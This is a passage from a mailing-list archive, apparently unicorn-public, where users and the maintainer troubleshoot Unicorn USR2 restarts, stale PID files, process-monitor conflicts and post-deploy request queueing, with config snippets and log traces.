Can you setup a test instance on a different nginx port/unicorn socket
and with a config.ru such as:

------------------------- 8< ----------------------
run(lambda do |env|
  $stderr.write("#$$ starting at #{Time.now}\n")
  # be sure to configure your unicorn timeout
  sleep
  # should not return, wait for unicorn to kill
end)
----------------------------------------------------

And hitting nginx with a single test request to reproduce the issue.

And see if it happens on the same/different hosts where you notice the
problem.

^ permalink raw reply	[relevance 3%]

* Re: On USR2, new master runs with same PID
  2015-03-20  1:58  8%       ` Kevin Yank
@ 2015-03-20  2:08  8%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-20  2:08 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Regarding zero-downtime deploys:
> 
> On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> > Best bet would be to run with double the workers temporarily unless
> > you're too low on memory (and swapping) or backend (DB) connections or
> > any other resource.
>  
> I’d like to take this approach as I do have enough memory to spare.
> How do you usually implement this? Any good write-ups or sample
> configs you can point me to?

Only send SIGUSR2 to the master, leaving you with two masters and two
sets of workers.  Skip (automated) sending of SIGTTOU signals to lower
worker count to the old master.

Eventually, you'll decide to send SIGQUIT to the old master to stop
it (or the new one, if you decide the new code is broken).

You can still combine this with SIGWINCH (or SIGTTOU) to stop traffic
flow to the old master, too.

Thanks for following up on your logrotate/eye issue, by the way.

^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:45  7%     ` Eric Wong
  2015-03-20  1:55  8%       ` Kevin Yank
@ 2015-03-20  1:58  8%       ` Kevin Yank
  2015-03-20  2:08  8%         ` Eric Wong
  1 sibling, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-20  1:58 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 576 bytes --]

Regarding zero-downtime deploys:

On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:

> Best bet would be to run with double the workers temporarily unless
> you're too low on memory (and swapping) or backend (DB) connections or
> any other resource.

I’d like to take this approach as I do have enough memory to spare. How do you usually implement this? Any good write-ups or sample configs you can point me to?

Thanks again,

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:45  7%     ` Eric Wong
@ 2015-03-20  1:55  8%       ` Kevin Yank
  2015-03-20  1:58  8%       ` Kevin Yank
  1 sibling, 0 replies; 200+ results
From: Kevin Yank @ 2015-03-20  1:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1165 bytes --]


> On 12 Mar 2015, at 5:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> Kevin Yank <kyank@avalanche.com.au> wrote:
>> It’s possible; I’m using eye (https://github.com/kostya/eye) as a
> 
> Aha!  I forgot about that one, try upgrading to unicorn 4.8.3 which
> fixed this issue last year.  ref:
> 
> http://bogomips.org/unicorn-public/m/20140504023338.GA583@dcvr.yhbt.net.html
> http://bogomips.org/unicorn-public/m/20140502231558.GA4215@dcvr.yhbt.net.html

Finally solved this definitively. It was user error to do with my setup of the eye process monitor.

I’d accidentally deployed a buggy logrotate configuration for eye, which was causing a second eye daemon to be spawned once a day (when the logs were rotated). Those two eye daemons ran side-by-side, and fought with each other when one was told to restart Unicorn. I’d already anticipated and fixed this problem, but failed to deploy the correct version of the config to our cluster.

All fixed now. Thanks for your pointers; they put me on the right track. :)

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  6:26  8%   ` Kevin Yank
@ 2015-03-12  6:45  7%     ` Eric Wong
  2015-03-20  1:55  8%       ` Kevin Yank
  2015-03-20  1:58  8%       ` Kevin Yank
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2015-03-12  6:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> It’s possible; I’m using eye (https://github.com/kostya/eye) as a

Aha!  I forgot about that one, try upgrading to unicorn 4.8.3 which
fixed this issue last year.  ref:

http://bogomips.org/unicorn-public/m/20140504023338.GA583@dcvr.yhbt.net.html
http://bogomips.org/unicorn-public/m/20140502231558.GA4215@dcvr.yhbt.net.html

<snip>

> unicorn master
> `- unicorn master 
> `- unicorn worker[2]
> |  `- unicorn worker[2]
> `- unicorn worker[1]
> |  `- unicorn worker[1]
> `- unicorn worker[0]
>    `- unicorn worker[0]

The second master there is the new one, and the first is the old one.

I was more concerned if there are multiple masters with no parent-child
relationship to each other; but that seems to not be the case.

But yeah, give 4.8.3 a try since it should've fixed the problem
(which was reported and confirmed privately)

> This has been happening pretty frequently across multiple server
> instances, and again once it starts happening on an instance, it keeps
> happening 100% of the time (until I restart Unicorn completely). So
> it’s not a rare edge case.

You can probably recover by removing the pid files entirely
and HUP the (only) master; but I haven't tried it...

> > That's a pretty fragile config and I regret ever including it in the
> > example config files

> Any better examples/docs you’d recommend I consult for guidance? Or is
> expecting to achieve a robust zero-downtime restart using
> before_fork/after_fork hooks unrealistic?

Best bet would be to run with double the workers temporarily unless
you're too low on memory (and swapping) or backend (DB) connections or
any other resource.

If you're really low on memory/connections, do WINCH + USR2 + QUIT (and
pray the new master works right :).  Clients will suffer in response
time as your new app loads, so do it during non-peak traffic and/or
shift traffic away from that machine.

You can also send TTOU a few times to reduce worker counts instead of
WINCH to nuke all of them, but I'd send all signals via deploy
script/commands rather than automatically via (synchronous) hooks.

But that's just me; probably others do things differently...

^ permalink raw reply	[relevance 7%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:45 10% ` Eric Wong
@ 2015-03-12  6:26  8%   ` Kevin Yank
  2015-03-12  6:45  7%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-12  6:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 5164 bytes --]

Thanks for your help, Eric!

> On 12 Mar 2015, at 12:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> Kevin Yank <kyank@avalanche.com.au> wrote:
>> When I send USR2 to the master process (PID 19216 in this example), I
>> get the following in the Unicorn log:
>> 
>> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
>> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
>> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
> 
> Nothing suspicious until the above line...

That’s right.

>> And when I check, indeed, there is now unicorn.pid and
>> unicorn.pid.oldbin, both containing 19216.
> 
> Any chance you have a process manager or something else creating the
> (non-.oldbin) pid file behind unicorn's back?

It’s possible; I’m using eye (https://github.com/kostya/eye) as a process monitor. I’m not aware of it writing .pid files for processes that self-daemonize like Unicorn, though. And once one of my servers “goes bad” (i.e. Unicorn starts failing to restart in response to a USR2), it does so 100% consistently until I stop and restart Unicorn entirely. Based on that, I don’t believe it’s a race condition where my process monitor is slipping in a new unicorn.pid file some of the time.

> Can you check your process table to ensure there's not multiple
> unicorn instances running off the same config and pid files, too?

As far as I can tell, I have some servers that have gotten themselves into this “USR2 restart fails” state, while others are working just fine. In both cases, the Unicorn process tree (as show in htop) looks like this “at rest” (i.e. no deployments/restarts in progress):

unicorn master
`- unicorn master
`- unicorn worker[2]
|  `- unicorn worker[2]
`- unicorn worker[1]
|  `- unicorn worker[1]
`- unicorn worker[0]
   `- unicorn worker[0]

At first glance I’d definitely say it appears that I have two masters running from the same config files. However, there’s only one unicorn.pid file of course (the root process in the tree above), and when I try to kill -TERM the master process that doesn’t have a .pid file, the entire process tree exits. Am I misinterpreting the process table? Is this process list actually normal?

Thus far I’ve been unable to find any difference in state between a properly-behaving server and a misbehaving server, apart from the behaviour of the Unicorn master when it receives a USR2.

> Also, were there other activity (another USR2 or HUP) in the logs
> a few seconds beforehand?

No, didn’t see anything like that (and I was looking for it).

> What kind of filesystem / kernel is the pid file on?

EXT4 / Ubuntu Server 12.04 LTS

> A network FS or anything without the consistency guarantees provided
> by POSIX would not work for pid files.

Given my environment above, I should be OK, right?

> pid files are unfortunately prone to to nasty race conditions,
> but I'm not sure what you're seeing happens very often.

This has been happening pretty frequently across multiple server instances, and again once it starts happening on an instance, it keeps happening 100% of the time (until I restart Unicorn completely). So it’s not a rare edge case.

> -------------------8<-------------------
>>  sleep 10
>> 
>>  old_pid = "#{server.config[:pid]}.oldbin"
>>  if File.exists?(old_pid) && server.pid != old_pid
>>    begin
>>      Process.kill("QUIT", File.read(old_pid).to_i)
>>    rescue Errno::ENOENT, Errno::ESRCH
>>      # someone else did our job for us
>>    end
>>  end
> -------------------8<-------------------
> 
> I'd get rid of that hunk starting with the "sleep 10" (at least while
> debugging this issue).

If I simply delete this hunk, I’ll have old masters left running on my servers because they’ll never get sent the QUIT signal. I can definitely remove it temporarily (and kill the old master myself) while debugging, though.

> If you did a USR2 previously, maybe it could
> affect the current USR2 upgrade process.  Sleeping so long in the master
> like that is pretty bad it throws off timing and delays signal handling.

I’d definitely like to get rid of the sleep, as my restarts definitely feel slow. I’m not clear on what a better approach would be, though.

> That's a pretty fragile config and I regret ever including it in the
> example config files

Any better examples/docs you’d recommend I consult for guidance? Or is expecting to achieve a robust zero-downtime restart using before_fork/after_fork hooks unrealistic?

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:04  5% On USR2, new master runs with same PID Kevin Yank
@ 2015-03-12  1:45 10% ` Eric Wong
  2015-03-12  6:26  8%   ` Kevin Yank
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-12  1:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Having recently migrated our Rails app to MRI 2.2.0 (which may or may
> not be related), we’re experiencing problems with our Unicorn
> zero-downtime restarts.
> 
> When I send USR2 to the master process (PID 19216 in this example), I
> get the following in the Unicorn log:
>
> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)

Nothing suspicious until the above line...

<snip>

> And when I check, indeed, there is now unicorn.pid and
> unicorn.pid.oldbin, both containing 19216.
> 
> What could cause this situation to arise?

Any chance you have a process manager or something else creating the
(non-.oldbin) pid file behind unicorn's back?

Can you check your process table to ensure there's not multiple
unicorn instances running off the same config and pid files, too?

Also, were there other activity (another USR2 or HUP) in the logs
a few seconds beforehand?

What kind of filesystem / kernel is the pid file on?
A network FS or anything without the consistency guarantees provided
by POSIX would not work for pid files.

pid files are unfortunately prone to to nasty race conditions,
but I'm not sure what you're seeing happens very often.

Likewise, the check for stale Unix domain socket paths at startup is
inevitably racy, too, but the window is usually small enough to be
unnoticeable.  But yes, just in case, check the process table to make
sure there aren't multiple, non-related masters running on off the
same paths.

<snip>

> before_fork do |server, worker|
>   ActiveRecord::Base.connection.disconnect!

-------------------8<-------------------
>   sleep 10
> 
>   old_pid = "#{server.config[:pid]}.oldbin"
>   if File.exists?(old_pid) && server.pid != old_pid
>     begin
>       Process.kill("QUIT", File.read(old_pid).to_i)
>     rescue Errno::ENOENT, Errno::ESRCH
>       # someone else did our job for us
>     end
>   end
-------------------8<-------------------

I'd get rid of that hunk starting with the "sleep 10" (at least while
debugging this issue).  If you did a USR2 previously, maybe it could
affect the current USR2 upgrade process.  Sleeping so long in the master
like that is pretty bad it throws off timing and delays signal handling.

That's a pretty fragile config and I regret ever including it in the
example config files

^ permalink raw reply	[relevance 10%]

* On USR2, new master runs with same PID
@ 2015-03-12  1:04  5% Kevin Yank
  2015-03-12  1:45 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-12  1:04 UTC (permalink / raw)
  To: unicorn-public

Having recently migrated our Rails app to MRI 2.2.0 (which may or may not be related), we’re experiencing problems with our Unicorn zero-downtime restarts.

When I send USR2 to the master process (PID 19216 in this example), I get the following in the Unicorn log:

I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
/srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
  from /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:134:in `start'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/bin/unicorn:126:in `<top (required)>'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `load'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `<main>'
E, [2015-03-11T23:47:36.519549 #19216] ERROR -- : reaped #<Process::Status: pid 6848 exit 1> exec()-ed
E, [2015-03-11T23:47:36.520296 #19216] ERROR -- : master loop error: Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
E, [2015-03-11T23:47:36.520496 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid='
E, [2015-03-11T23:47:36.520650 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:404:in `reap_all_workers'
E, [2015-03-11T23:47:36.520790 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:279:in `join'
E, [2015-03-11T23:47:36.520928 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/bin/unicorn:126:in `<top (required)>'
E, [2015-03-11T23:47:36.521115 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `load'
E, [2015-03-11T23:47:36.521254 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `<main>’

And when I check, indeed, there is now unicorn.pid and unicorn.pid.oldbin, both containing 19216.

What could cause this situation to arise?


Here’s my unicorn.rb FWIW:

# Set your full path to application.
app_path = "/srv/ourapp/current"

# Set unicorn options
worker_processes 3
preload_app true
timeout 30
listen "/srv/ourapp/shared/sockets/unicorn.sock", :backlog => 64

# Spawn unicorn master worker for user deploy (group: deploy)
user 'deploy', 'deploy'

# Fill path to your app
working_directory app_path

# Should be 'production' by default, otherwise use other env
rails_env = ENV['RAILS_ENV'] || 'production'

# Log everything to one file
stderr_path "/srv/ourapp/shared/log/unicorn.log"
stdout_path "/srv/ourapp/shared/log/unicorn.log"

# Set master PID location
pid "/srv/ourapp/shared/pids/unicorn.pid"

before_exec do |server|
  ENV["BUNDLE_GEMFILE"] = "#{app_path}/Gemfile"
end

before_fork do |server, worker|
  ActiveRecord::Base.connection.disconnect!

  sleep 10

  old_pid = "#{server.config[:pid]}.oldbin"
  if File.exists?(old_pid) && server.pid != old_pid
    begin
      Process.kill("QUIT", File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # someone else did our job for us
    end
  end
end

after_fork do |server, worker|
  ActiveRecord::Base.establish_connection

  Sidekiq.configure_client do |config|
    config.redis = { namespace: 'sidekiq' }
  end
end


--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083



^ permalink raw reply	[relevance 5%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  3%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
@ 2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:32 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I also use newrelic and never saw this grey part...

On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  3%                     ` Sarkis Varozian
@ 2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:31 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I would try to reproduce this locally with a production env and `ab -n 200
-c 2 http://localhost:3000/`



On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
